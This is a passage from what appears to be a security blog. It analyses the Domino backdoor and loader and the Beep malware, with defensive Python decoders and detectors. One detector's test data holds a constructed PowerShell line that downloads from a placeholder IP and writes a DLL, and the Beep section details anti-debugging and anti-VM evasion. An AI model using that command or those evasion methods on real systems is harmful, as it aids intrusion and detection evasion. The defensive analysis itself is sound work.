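    print("guessed key length:", guess_key_len(section))
    for host, port in extract_from_section(section):
        print(f"C2 {host}:{port}")
```

The key-length guess works because a wrong length decrypts only the positions that happen to line up with the real key, so most of the output lands outside the printable range; with a real sample, feed the data section bytes starting at the key into extract_from_section and block the returned endpoints.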

C2 Communications

To secure the data transfer, Domino generates a random 32-byte (256-bit) session key and encrypts it with an RSA public key embedded in the binary; this RSA step is used only for the initial connection. The malware then collects information about the system and sends it. Subsequent C2 traffic is encrypted with AES-256-CBC under that session key, which the server received in the initial package, so only a C2 holding the matching RSA private key can read the exchange.

The way Domino picks its primary C2 is also interesting. By design, the malware configuration holds only two C2 addresses. If the infected host is joined to a Windows domain, Domino uses the second address as primary; on a stand-alone computer it chooses the first one.

To drive the malware, the C2 sends a set of commands and a payload, encrypted in the same way as the data sent by the client. The commands specify not only the action but also the preferred way to run the payload. The command set is as follows:

Command    Explanation
0x1        Copy the payload into the allocated memory. The allocation details come with the 0x5/0x6 commands.
0x3        Quit execution.
0x4        Save the retrieved payload to the %Temp% folder. The file name is generated with GetTempFileNameA, and the file is then launched with CreateProcessA.
0x5, 0x6   Instruct the malware to allocate memory for the payload inside a specified process.
0x7        Enumerate running processes and send the list to the server. Precedes 0x5/0x6, as it gives the C2 the candidate processes for injection.

Domino Loader

Domino Loader resembles the Domino Backdoor in many ways, hence the shared name. It uses the same C2 request encryption. However, it gathers far less data about the system; its capabilities centre on retrieving and running a payload DLL. For that it uses the well-known ReflectiveDLLInjection project, a reference implementation of reflective DLL loading. This is not the only way the loader can operate: it changes behaviour depending on the command that accompanies the payload from the C2, which in turn depends on the form the payload arrives in.

The command convention is much the same as in the Domino Backdoor: a single command byte preceding the payload indicates what the malware should do. In addition, the payload is followed by a value that tells the loader the preferred loading method. If the value is greater than 0, the loader allocates memory within its own process and calls into the DLL payload at the offset equal to that value; this is the mode that relies on the ReflectiveDLLInjection technique.

A value of 0 means the payload is run as a .NET assembly. The loader calls VirtualAlloc to allocate memory with PAGE_EXECUTE_READWRITE protection, copies the payload in, and hands it to Assembly.Load, which loads and runs it.

When the value is -1, Domino Loader performs a manual PE load. It first allocates memory in its current process, as in the DLL case, then copies the PE headers and sections into the new region, resolves the imports and finally transfers control to the entry point. In this case the loader applies the offsets recorded in the payload’s own PE sections.
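The three loading modes above amount to a small wire format: one command byte, the payload, and a trailing mode value. The decoder below is an added example, not code from the article or the IBM report; it assumes the trailing value is a 4-byte signed little-endian integer (the report does not state its width) and uses constructed stand-in payloads rather than real ones. The sanity checks on the payload (PE signature present, reflective-loader offset inside the payload, CLR metadata signature for the .NET case) are what an analyst’s own decoder would add before acting on a C2 envelope.

```python
import struct

MODE_LEN = 4  # assumption: the trailing loading-mode value is a 4-byte signed little-endian int


def parse_envelope(blob: bytes) -> dict:
    """Split [command byte][payload][mode value] as described for Domino Loader."""
    if len(blob) < 1 + MODE_LEN:
        raise ValueError("envelope too short for a command byte and a mode value")
    command = blob[0]
    payload = blob[1:-MODE_LEN]
    (mode,) = struct.unpack("<i", blob[-MODE_LEN:])
    return {"command": command, "payload": payload, "mode": mode}


def looks_like_pe(data: bytes) -> bool:
    """Minimal PE check: MZ stub plus a PE\\0\\0 signature at the e_lfanew offset."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify_loading(env: dict) -> tuple:
    """Map the mode value to the loading path the article describes, with sanity checks."""
    mode, payload = env["mode"], env["payload"]
    if mode > 0:
        if not looks_like_pe(payload):
            return ("reject", "reflective DLL load requested but payload is not a PE")
        if mode >= len(payload):
            return ("reject", "reflective loader offset lies outside the payload")
        return ("reflective_dll", f"call exported loader at payload offset 0x{mode:x}")
    if mode == 0:
        # .NET metadata begins with the "BSJB" signature; a CLR payload without it is suspect.
        if not looks_like_pe(payload) or b"BSJB" not in payload:
            return ("reject", ".NET load requested but payload is not a PE carrying CLR metadata")
        return ("dotnet_assembly", "VirtualAlloc RWX, copy in, Assembly.Load")
    if mode == -1:
        if not looks_like_pe(payload):
            return ("reject", "PE load requested but payload has no PE headers")
        return ("pe_manual_map", "copy headers and sections, resolve imports, jump to entry point")
    return ("reject", f"unknown loading mode {mode}")


def fake_pe(extra: bytes = b"", size: int = 0x200) -> bytes:
    """Constructed stand-in for a PE payload: valid MZ/PE signatures only, no real code."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)   # 0x40-byte DOS header
    struct.pack_into("<I", hdr, 0x3C, 0x40)   # e_lfanew points right after the DOS header
    body = bytes(hdr) + b"PE\x00\x00" + extra
    return body + b"\x00" * max(0, size - len(body))


def build_envelope(command: int, payload: bytes, mode: int) -> bytes:
    """Assemble an envelope in the assumed format (used here to produce test input)."""
    return bytes([command]) + payload + struct.pack("<i", mode)


def decode(blob: bytes) -> tuple:
    """Parse and classify in one step."""
    return classify_loading(parse_envelope(blob))


if __name__ == "__main__":
    for mode in (0x100, 0x10000, 0, -1, -2):
        print(mode, decode(build_envelope(0x1, fake_pe(b"BSJB"), mode)))
```

When decoding captured traffic, run decode() on the decrypted command blob after the AES layer has been stripped; a "reject" result is itself a useful signal, since a malformed envelope usually means the assumed width of the mode value is wrong for that sample.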

Protection against Domino Backdoor/Domino Loader

This malware is rare enough that it is hard to judge the best countermeasures, yet they are definitely needed, as Domino promises to be pretty dangerous. The most important input for such guidance, the distribution vector, is still unclear. It may become clearer as Domino gains popularity; for now, only general measures can be recommended with confidence.

Use a security solution that applies a zero-trust policy to programs. Only when no program is trusted by default can you be sure that a new, cunning malware hiding behind a benign application will not slip past your security tool. Zero trust has its downsides, but they are far less critical than a workflow paralysed by a ransomware attack.

Improve your network security. This advice is Domino-specific: the malware carries a list of only two C2 servers. That may change in future, but currently blocking them is not a big deal. It is much easier to do with a Network Detection and Response solution, which automatically weeds out potentially malicious requests and also provides a lot of analytics. Malware that cannot reach its C2 is useless: it cannot receive payloads or do anything else unpleasant.

New stealthy “Beep” malware focuses heavily on evading detection
https://gridinsoft.com/blogs/beep-malware-detection-evasion/
Fri, 03 Mar 2023 10:26:15 +0000
Cybercriminals periodically come up with something new. Sometimes it is an updated version of already known malware, and sometimes it is something genuinely new, such as Beep malware. Beep has one distinguishing feature: an unusually heavy focus on evading detection. Although it is still under development, it already carries working functionality to avoid analysis and detection by security software.

What kind of malware is Beep?

Not so long ago, researchers at Minerva Labs discovered a very interesting malware with an equally interesting name, Beep. Beep is a new stealthy malware with several features designed to steal sensitive information and to build a chain of infections, i.e. to download and install additional malware or components. As a result, it can infect devices with trojans, ransomware, cryptocurrency miners or other malware.
Beep is thought to be delivered via spam email attachments or Discord and OneDrive URLs. It is also described as malware-as-a-service, offering other criminals the ability to spread their payloads through the botnet of Beep-infected machines. It consists of three components: a dropper, an injector and a payload.

Image: Beep malware page on VirusTotal.

Dropper

The dropper starts its work after a series of anti-debugging and anti-VM checks. It then creates a new registry value named “AphroniaHaimavati” holding a base64-encoded PowerShell script, and registers a scheduled task that runs every 13 minutes and executes the PowerShell script stored in the registry. That script downloads further data and saves it to disk as the injector, AphroniaHaimavati.dll.
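The persistence pattern above (an encoded PowerShell script parked in the registry, launched by a scheduled task on a short timer) is easy to hunt for in exported task and registry data. The script below is an added example, not code from the article or the Minerva report; it runs the detection logic over constructed records that mimic what Get-ScheduledTask and a registry export would give you, and decodes an encoded command the way PowerShell does (base64 of UTF-16LE text). The 15-minute threshold, the keyword list and the sample script text are this example’s own choices.

```python
import base64
import re

# Constructed sample PowerShell, base64-encoded the way "-EncodedCommand" expects (UTF-16LE).
SAMPLE_SCRIPT = ("$d = Invoke-WebRequest http://203.0.113.10/x; "
                 "[IO.File]::WriteAllBytes('AphroniaHaimavati.dll', $d.Content)")
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()

# Constructed task records (not from a real host), shaped like Get-ScheduledTask output.
TASKS = [
    {"name": "UpdateCheck", "interval": "PT13M", "execute": "powershell.exe",
     "arguments": f"-NoP -W Hidden -enc {SAMPLE_ENC}"},
    {"name": "GoogleUpdateTaskMachineUA", "interval": "PT1H",
     "execute": r"C:\Program Files\Google\Update\GoogleUpdate.exe", "arguments": "/ua"},
    {"name": "RegLoader", "interval": "PT13M", "execute": "powershell.exe",
     "arguments": r"-Command IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("
                  r"(Get-ItemProperty HKCU:\Software\Foo).AphroniaHaimavati)))"},
    {"name": "Backup", "interval": "P1D", "execute": "robocopy.exe", "arguments": r"C:\data D:\bak /MIR"},
]

# Constructed registry export: (key path, value name, data).
REG_VALUES = [
    (r"HKCU\Software\Foo", "AphroniaHaimavati", SAMPLE_ENC),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer", "ShellState", "240000001ea8000000000000"),
]

ISO_DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")
PS_KEYWORDS = ("Invoke-", "IEX", "FromBase64String", "WebRequest", "DownloadString", "WriteAllBytes")


def interval_minutes(iso):
    """Convert an ISO 8601 repetition interval (e.g. PT13M) to minutes; None if unparsable."""
    m = ISO_DURATION.match(iso or "")
    if not m or not any(m.groups()):
        return None
    d, h, mi, s = (int(g) if g else 0 for g in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def decode_encoded_command(arguments: str):
    """Extract and decode a -e/-ec/-enc/-EncodedCommand argument; None when absent or invalid."""
    m = re.search(r"-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]{16,})", arguments, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def suspicious_tasks(tasks, max_minutes=15):
    """Flag tasks that run PowerShell on a short timer with encoded or registry-sourced code."""
    findings = []
    for t in tasks:
        mins = interval_minutes(t.get("interval"))
        if mins is None or mins > max_minutes or "powershell" not in t.get("execute", "").lower():
            continue
        args = t.get("arguments", "")
        decoded = decode_encoded_command(args)
        reg_sourced = "FromBase64String" in args and "Get-ItemProperty" in args
        if decoded or reg_sourced:
            findings.append({"task": t["name"], "interval_min": mins,
                             "decoded": decoded, "registry_sourced": reg_sourced})
    return findings


def suspicious_registry_values(values, min_len=64):
    """Flag long base64 registry data that decodes to PowerShell-looking UTF-16LE text."""
    findings = []
    for path, name, data in values:
        if len(data) < min_len or not re.fullmatch(r"[A-Za-z0-9+/=]+", data):
            continue
        try:
            text = base64.b64decode(data, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
        if any(k in text for k in PS_KEYWORDS):
            findings.append({"path": path, "value": name, "script": text})
    return findings


if __name__ == "__main__":
    for f in suspicious_tasks(TASKS):
        print(f"[task] {f['task']} every {f['interval_min']:g} min; decoded: {f['decoded']!r}")
    for f in suspicious_registry_values(REG_VALUES):
        print(f"[reg] {f['path']}\\{f['value']} -> {f['script']}")
```

On a live host, feed suspicious_tasks() the Name, Triggers[0].Repetition.Interval, Actions.Execute and Actions.Arguments fields from Get-ScheduledTask, and suspicious_registry_values() a dump of string values under the Run-adjacent and application keys; the two checks complement each other because the task alone may only reference the registry value, as the RegLoader record shows.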

Injector

The injector, which itself applies several anti-debugging and anti-VM techniques, injects the payload into a legitimate system process, for example WWAHost.exe. It does this by process hollowing, which is meant to hide the payload from antivirus tools.

Payload

The primary payload attempts to collect the required data from the compromised machine, encrypt it and send it to a hard-coded C2. Although that C2 address was offline during the analysis, the malware kept trying to connect even after 120 failed attempts.

Despite the limitations of malware analysis, experts were still able to detect the following functions in the sample, which are triggered by C2 commands:

  • dll (executes a DLL file)
  • exe (runs an .exe file)
  • shellcode (executes further shellcode)
  • screenshot (a task that, despite its name, appears to collect the process list)
  • additional (gathers more data)
  • knock timeout (modifies the keep-alive interval for the C&C)

Moreover, it has at least four functions that were not exercised during the test: destroy, init, task and balancer. This, however, does not make it any less dangerous.

Evading detection methods

Let’s look at what makes Beep stand out: the detection-evasion techniques it uses throughout execution. Digging into the sample, analysts noticed a large number of evasion techniques, which gave the impression that the authors were trying to cram in as many anti-debugging and anti-VM (anti-sandbox) tricks as possible. One of them delays execution via the Beep API, hence the malware’s name.

Anti-analysis features in Beep malware:

  • Beep API anti-sandbox. This is the function the malware is named after. Used as an alternative to the Sleep API, it emits a tone on the PC speaker and, more importantly, stalls execution so that a sandbox with a short analysis window gives up before the malicious code runs.
  • Dynamic string deobfuscation. Strings are kept obfuscated the whole time and are decoded only when they are about to be used. Deobfuscation is done with xor/sub/add/not instruction sequences.
  • System language check. A typical locale check often seen in malware developed in ex-USSR countries, particularly Russia and Ukraine, meant to avoid infecting machines in those locations. Note that it inspects the system language, not the IP geolocation. If Russian, Ukrainian, Belarusian, Tajik, Slovenian, Georgian, Kazakh or Uzbek (Cyrillic) is detected, Beep ceases further execution.
  • NtGlobalFlag anti-debugging. The malware reads the NtGlobalFlag field of the Process Environment Block. When a process is started under a debugger, the heap-checking flags (FLG_HEAP_ENABLE_TAIL_CHECK, FLG_HEAP_ENABLE_FREE_CHECK and FLG_HEAP_VALIDATE_PARAMETERS, 0x70 combined) are set; if they are, Beep stops.
  • Own implementation of IsDebuggerPresent. Instead of calling the API, Beep reimplements it in assembly, reading the BeingDebugged flag of the PEB directly to see whether a user-mode debugger is attached, which also sidesteps hooks placed on the API.
  • Stack segment register check. Being written in assembly, Beep can talk to the processor directly. The classic push ss / pop ss / pushf sequence delays a single-step trap by one instruction, so the Trap Flag becomes visible in the saved flags when the code is being single-stepped in a debugger.
  • Read Time Stamp Counter (RDTSC) check. The malware reads the CPU cycle counter twice and measures the gap; an unusually large gap indicates that execution is being single-stepped or slowed down by a virtual machine. Heavily loaded hosts can cause false positives.
  • CPUID anti-VM. Using the CPUID instruction, the malware obtains the hypervisor brand string, which identifies the virtualization vendor. Names like VMware, Oracle, Parallels, Citrix or others trigger the self-destruction procedure.
  • VBOX registry key anti-VM. One of the simplest checks: it looks for VM-specific registry keys (VirtualBox in this case). Finding one makes the malware self-destruct.

The injector component implements the following evasion methods:

  • INT 3 and INT 2D anti-debugging. Both raise an exception on purpose. INT 3 is the software-breakpoint instruction: without a debugger the malware’s own exception handler runs, while an attached debugger swallows the breakpoint and the handler never executes, revealing its presence. INT 2D behaves similarly and additionally lets the malware alter its execution flow once a debugger is detected.
  • CheckRemoteDebuggerPresent() anti-debugging. This kernel32.dll function sets its pbDebuggerPresent output to TRUE when a debugger is attached to the process. Internally it calls NtQueryInformationProcess with the ProcessDebugPort information class.
  • IsDebuggerPresent() anti-debugging. The simplest method, which detects user-mode debuggers such as OllyDbg or x64dbg attached to the current process. Under the hood it only reads the BeingDebugged flag of the Process Environment Block (PEB).
  • ProcessDebugPort anti-debugging. Lets the malware query the debug port of a process via ntdll!NtQueryInformationProcess(). The documented ProcessDebugPort class returns a DWORD of 0xFFFFFFFF (-1) when the process is being debugged.
  • VirtualAlloc()/GetWriteWatch() anti-debugging. Memory allocated with the MEM_WRITE_WATCH flag can be queried with GetWriteWatch, which returns the addresses of pages written to since the region was allocated or the tracking state was reset. A debugger that writes into that region (for example to place a breakpoint) changes the write count outside the expected pattern and is thereby detected.
  • OutputDebugString() anti-debugging. A detection method based on the error state after the call. It is obsolete because it only works on Windows versions before Vista: there, calling kernel32!OutputDebugString with no debugger attached sets an error code, whereas under a debugger it does not.
  • QueryPerformanceCounter() and GetTickCount64() anti-debugging. These retrieve a high-resolution timestamp (sub-microsecond) or the system uptime in milliseconds. The malware measures the time between two points in its code; a delay far longer than normal execution indicates single-stepping in a debugger.

How dangerous is the Beep malware?

The authors of Beep malware primarily focus on evading detection, which makes it hard for security software and researchers to detect and analyze it. On the other hand, it has shown minimal and incomplete functionality for its actual purpose, i.e. stealing data and executing commands. Still, nothing stops the hackers from expanding the malicious functionality, and even if this particular sample is more of a technology demonstrator, expect to see these evasion techniques in other, more widespread malware.
